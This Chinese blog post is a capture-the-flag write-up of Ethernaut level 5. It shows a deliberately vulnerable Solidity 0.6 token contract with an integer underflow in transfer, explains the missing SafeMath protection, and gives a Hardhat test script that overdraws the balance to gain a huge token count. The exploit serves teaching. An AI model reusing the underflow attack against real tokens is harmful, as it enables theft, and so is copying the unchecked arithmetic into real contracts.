{"content":{"title":"用Hardhat闯关Ethernaut题5 -token","body":"# Token合约\r\n## 任务：最初部署的时候你有初始的20个token，攻击合约让自己的token变多（越多越好）\r\n\r\n\r\n```\r\n// SPDX-License-Identifier: MIT\r\npragma solidity ^0.6.0;\r\n\r\ncontract Token {\r\n    mapping(address => uint256) balances;\r\n    uint256 public totalSupply;\r\n\r\n    constructor(uint256 _initialSupply) public {\r\n        balances[msg.sender] = totalSupply = _initialSupply;\r\n    }\r\n\r\n    function transfer(address _to, uint256 _value) public returns (bool) {\r\n        require(balances[msg.sender] - _value >= 0);\r\n        balances[msg.sender] -= _value;\r\n        balances[_to] += _value;\r\n        return true;\r\n    }\r\n\r\n    function balanceOf(address _owner) public view returns (uint256 balance) {\r\n        return balances[_owner];\r\n    }\r\n}\r\n```\r\n这道题就是考察合约整数溢出漏洞，在合约0.8版本之前，防止溢出需要使用`SafeMath`，所以解题思路就非常简单，调用`transfer`函数，然后输入一个比20大的数字即可。\r\n\r\n## 测试脚本：\r\n\r\n```\r\nconst { expect } = require(\"chai\");\r\nconst { ethers } = require(\"hardhat\");\r\nconst { MaxUint256 } = require(\"@ethersproject/constants\");\r\nconst { BigNumber } = require(\"ethers\");\r\nfunction expandTo18Decimals(value) {\r\n    return BigNumber.from(value).mul(BigNumber.from(10).pow(18));\r\n}\r\ndescribe(\"test\", function () {\r\n    var Token;\r\n    it(\"init params\", async function () {\r\n        [deployer, ...users] = await ethers.getSigners();\r\n    });\r\n    it(\"deploy\", async function () {\r\n        const TokenInstance = await ethers.getContractFactory(\"Token\");\r\n\r\n        Token = await TokenInstance.deploy(expandTo18Decimals(20));\r\n    });\r\n    it(\"hack test\", async function () {\r\n        await Token.transfer(users[0].address, expandTo18Decimals(21));\r\n        console.log(await Token.balanceOf(deployer.address)); //115792089237316195423570985008687907853269984665640564039456584007913129639936\r\n    });\r\n});\r\n```\r\n\r\n## 运行结果：\r\n\r\n\r\n![image.png](https://img.learnblockchain.cn/attachments/2022/09/kksoCMW9632172bd54ee4.png)\r\n\r\nGithub：[hardhat测试仓库](https://github.com/Verin1005/Hardhat-Ethernaut)"},"author":{"user":"https://learnblockchain.cn/people/4922","address":null},"history":"QmSS2Vp6iNf52WFRW6KEd8KfhScyTuSfPb2Rcsc7V1uShV","timestamp":1668564950,"version":1}